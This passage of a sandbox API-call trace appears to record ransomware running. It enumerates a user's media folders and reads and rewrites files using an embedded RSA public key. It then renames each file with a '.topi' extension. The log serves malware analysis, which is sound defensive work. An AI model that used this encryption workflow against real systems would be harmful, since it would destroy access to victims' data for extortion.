Flags=0x0, Size=0x210) returned 0x99e9528 [0097.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0097.280] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0097.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.280] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0097.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d78 | out: hHeap=0x680000) returned 1 [0097.280] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0097.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0097.280] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0097.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df448 | out: hHeap=0x680000) returned 1 [0097.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0097.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0097.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0097.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0097.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0097.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.281] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.281] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4da8 | out: hHeap=0x680000) returned 1 [0097.281] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.281] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.281] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.281] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d90 | out: hHeap=0x680000) returned 1 [0097.281] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d60 | out: hHeap=0x680000) returned 1 [0097.281] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0097.281] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0097.281] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0097.281] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d48 | out: hHeap=0x680000) returned 1 [0097.281] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fb2f0 | out: hHeap=0x680000) returned 1 [0097.281] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.281] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0097.281] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0097.281] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0097.281] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0097.281] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.281] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.281] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0097.282] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0097.282] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.282] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0097.282] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x16622, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x16622, lpOverlapped=0x0) returned 1 [0097.282] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0097.282] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x16627, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.282] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0097.282] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0097.282] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0097.282] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0097.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.282] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0097.283] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.283] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0097.283] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0097.283] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0097.283] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.283] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0097.283] CloseHandle (hObject=0x6a8) returned 1 [0097.284] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b45e8 [0097.284] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8a0) returned 0x31cf750 [0097.285] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b45e8 | out: hHeap=0x680000) returned 1 [0097.285] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\FyEWgj\\kYrXk17A-2pFpx.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\fyewgj\\kyrxk17a-2pfpx.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\FyEWgj\\kYrXk17A-2pFpx.wav.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\fyewgj\\kyrxk17a-2pfpx.wav.topi")) returned 1 [0097.285] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.285] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.286] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.288] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3152ab8 | out: hHeap=0x680000) returned 1 [0097.288] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c3fcd20, ftCreationTime.dwHighDateTime=0x1d5be6a, ftLastAccessTime.dwLowDateTime=0x1cabff90, ftLastAccessTime.dwHighDateTime=0x1d5c092, ftLastWriteTime.dwLowDateTime=0x1cabff90, ftLastWriteTime.dwHighDateTime=0x1d5c092, nFileSizeHigh=0x0, nFileSizeLow=0x302d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZYstBfx9.m4a", cAlternateFileName="")) returned 1 [0097.288] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e39e8 [0097.288] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa6) returned 0x3152ab8 [0097.288] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e39e8 | out: hHeap=0x680000) returned 1 [0097.288] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\FyEWgj\\ZYstBfx9.m4a") returned=".m4a" [0097.288] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\FyEWgj\\ZYstBfx9.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\fyewgj\\zystbfx9.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.288] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=12333) returned 1 [0097.288] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.291] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x3007, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.291] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.292] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.292] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.292] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.292] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x302d, lpOverlapped=0x0) returned 1 [0097.292] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.292] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0097.292] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.293] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.293] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df448) returned 1 [0097.293] CryptCreateHash (in: hProv=0x6df448, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.293] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.293] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.294] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.294] GetLastError () returned 0x0 [0097.294] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.294] CryptReleaseContext (hProv=0x6df448, dwFlags=0x0) returned 1 [0097.294] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.294] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.294] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.294] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.294] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.294] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\FyEWgj\\ZYstBfx9.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\fyewgj\\zystbfx9.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\FyEWgj\\ZYstBfx9.m4a.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\fyewgj\\zystbfx9.m4a.topi")) returned 1 [0097.295] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.295] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.295] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.296] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3152ab8 | out: hHeap=0x680000) returned 1 [0097.296] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c3fcd20, ftCreationTime.dwHighDateTime=0x1d5be6a, ftLastAccessTime.dwLowDateTime=0x1cabff90, ftLastAccessTime.dwHighDateTime=0x1d5c092, ftLastWriteTime.dwLowDateTime=0x1cabff90, ftLastWriteTime.dwHighDateTime=0x1d5c092, nFileSizeHigh=0x0, nFileSizeLow=0x302d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZYstBfx9.m4a", cAlternateFileName="")) returned 0 [0097.296] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0097.296] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0097.296] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3e20 | out: hHeap=0x680000) returned 1 [0097.297] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0097.297] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0097.297] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\IgvWVBNSz\\") returned="IgvWVBNSz\\" [0097.297] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\") returned="Yo5RRMrTBRvZPTzk\\" [0097.297] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3f40 [0097.297] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.297] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb988 [0097.297] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3e20 | out: hHeap=0x680000) returned 1 [0097.297] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0097.297] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb338 [0097.297] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0097.297] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0097.297] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.297] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fb338 | out: hHeap=0x680000) returned 1 [0097.297] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0097.297] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.297] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.297] PathFindFileNameW (pszPath="") returned="" [0097.297] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4680 [0097.297] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\IgvWVBNSz\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43971740, ftCreationTime.dwHighDateTime=0x1d5c2a7, ftLastAccessTime.dwLowDateTime=0x4cc678c0, ftLastAccessTime.dwHighDateTime=0x1d5bb9e, ftLastWriteTime.dwLowDateTime=0x4cc678c0, ftLastWriteTime.dwHighDateTime=0x1d5bb9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31c7500 [0097.298] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4680 | out: hHeap=0x680000) returned 1 [0097.298] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43971740, ftCreationTime.dwHighDateTime=0x1d5c2a7, ftLastAccessTime.dwLowDateTime=0x4cc678c0, ftLastAccessTime.dwHighDateTime=0x1d5bb9e, ftLastWriteTime.dwLowDateTime=0x4cc678c0, ftLastWriteTime.dwHighDateTime=0x1d5bb9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0097.298] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x621c8100, ftCreationTime.dwHighDateTime=0x1d5b6c7, ftLastAccessTime.dwLowDateTime=0xdb15edc0, ftLastAccessTime.dwHighDateTime=0x1d5bf1a, ftLastWriteTime.dwLowDateTime=0xdb15edc0, ftLastWriteTime.dwHighDateTime=0x1d5bf1a, nFileSizeHigh=0x0, nFileSizeLow=0x13e32, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6zDorq7n8.avi", cAlternateFileName="6ZDORQ~1.AVI")) returned 1 [0097.298] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4680 [0097.298] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd6) returned 0x766b58 [0097.298] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4680 | out: hHeap=0x680000) returned 1 [0097.298] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\IgvWVBNSz\\6zDorq7n8.avi") returned=".avi" [0097.298] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\IgvWVBNSz\\6zDorq7n8.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\igvwvbnsz\\6zdorq7n8.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.298] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=81458) returned 1 [0097.298] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.301] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x13e0c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.301] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.302] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.302] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.302] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x13e32, lpOverlapped=0x0) returned 1 [0097.302] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.302] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0097.302] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.302] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.302] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df448) 